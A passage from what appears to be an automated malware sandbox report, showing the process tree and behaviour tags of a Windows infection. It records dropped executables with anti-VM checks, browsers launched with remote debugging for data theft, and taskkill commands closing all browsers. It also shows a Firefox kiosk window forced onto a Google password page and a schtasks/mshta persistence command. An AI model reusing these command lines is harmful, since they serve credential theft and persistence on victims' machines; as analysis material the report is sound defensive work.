PID:5896 -
C:\Users\Admin\AppData\Local\Temp\1086687001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086687001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\1086687001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086687001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 9644⤵
- Program crash
PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086688001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1086688001\C3hYpvm.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5284
-
-
C:\Users\Admin\AppData\Local\Temp\1086689001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086689001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\1086690001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086690001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5948 -
C:\Users\Admin\AppData\Local\Temp\1086690001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086690001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:5756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 9684⤵
- Program crash
PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086691001\7ff0b5b35b.exe"C:\Users\Admin\AppData\Local\Temp\1086691001\7ff0b5b35b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\1086692001\552ed52fd7.exe"C:\Users\Admin\AppData\Local\Temp\1086692001\552ed52fd7.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5348 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086693001\e64ecd84aa.exe"C:\Users\Admin\AppData\Local\Temp\1086693001\e64ecd84aa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4748 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:720
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086694001\468d16e1f1.exe"C:\Users\Admin\AppData\Local\Temp\1086694001\468d16e1f1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5792 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2852
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086695001\aaededfc8c.exe"C:\Users\Admin\AppData\Local\Temp\1086695001\aaededfc8c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5376
-
-
C:\Users\Admin\AppData\Local\Temp\1086696001\683611a9bc.exe"C:\Users\Admin\AppData\Local\Temp\1086696001\683611a9bc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\1086697001\dfc4ae4b5d.exe"C:\Users\Admin\AppData\Local\Temp\1086697001\dfc4ae4b5d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 15204⤵
- Program crash
PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086698001\8ac9a0a6fe.exe"C:\Users\Admin\AppData\Local\Temp\1086698001\8ac9a0a6fe.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\1086699001\0f776c5c7d.exe"C:\Users\Admin\AppData\Local\Temp\1086699001\0f776c5c7d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5532 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9a7ddcc40,0x7ff9a7ddcc4c,0x7ff9a7ddcc585⤵PID:2128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2396,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2392 /prefetch:25⤵PID:5168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1732,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2616 /prefetch:35⤵PID:5968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1812,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2636 /prefetch:85⤵PID:5200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3136 /prefetch:15⤵
- Uses browser remote debugging
PID:2040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3184 /prefetch:15⤵
- Uses browser remote debugging
PID:1944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4400 /prefetch:15⤵
- Uses browser remote debugging
PID:2384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4540,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4564 /prefetch:85⤵PID:6012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4536,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:85⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4696,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4636 /prefetch:85⤵PID:2092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,4441241389575231527,15311422069144799358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4356 /prefetch:85⤵PID:5684
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5188 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bbf546f8,0x7ff9bbf54708,0x7ff9bbf547185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:25⤵PID:6544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:35⤵PID:6560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:85⤵PID:6592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:15⤵
- Uses browser remote debugging
PID:6716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:15⤵
- Uses browser remote debugging
PID:6772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:25⤵PID:2332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4728 /prefetch:25⤵PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2516 /prefetch:25⤵PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4828 /prefetch:25⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2188 /prefetch:25⤵PID:3964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:15⤵
- Uses browser remote debugging
PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:15⤵
- Uses browser remote debugging
PID:7164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2272 /prefetch:25⤵PID:1164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4160 /prefetch:25⤵PID:6524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5314420862971309971,15037669957346053419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3188 /prefetch:25⤵PID:5336
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 24244⤵
- Program crash
PID:6516
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086700001\9dfd665e3d.exe"C:\Users\Admin\AppData\Local\Temp\1086700001\9dfd665e3d.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4780 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:6132
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2628 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb34e0d8-ea4d-4e27-b726-46c4ad007cf2} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" gpu6⤵PID:2872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73875d70-6d85-420e-b4b7-8fbf8a1f2d51} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" socket6⤵PID:5684
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1792 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 2696 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {962719a7-51f1-498d-850c-50590a9c39a2} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" tab6⤵PID:5980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3968 -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 3904 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcdbe2bf-b0a0-4977-840e-30188a86b1f9} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" tab6⤵PID:864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4596 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4088 -prefMapHandle 4588 -prefsLen 32822 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44fa80d8-fc36-4e5e-a721-0c43f8ccca11} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" utility6⤵
- Checks processor information in registry
PID:5236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5296 -childID 3 -isForBrowser -prefsHandle 5288 -prefMapHandle 5236 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c90ad2bf-2bc7-4e9d-880a-890042053f35} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" tab6⤵PID:6756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 4 -isForBrowser -prefsHandle 5532 -prefMapHandle 5528 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {803ecedd-fbee-43ff-86be-441a23490b29} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" tab6⤵PID:6784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5684 -childID 5 -isForBrowser -prefsHandle 5428 -prefMapHandle 5432 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6464ba00-3782-4f90-9d35-46420c23dd5d} 2628 "\\.\pipe\gecko-crash-server-pipe.2628" tab6⤵PID:6796
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086701001\1995896c1c.exe"C:\Users\Admin\AppData\Local\Temp\1086701001\1995896c1c.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn XlHnRmaQGf1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\ef7a88Un4.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
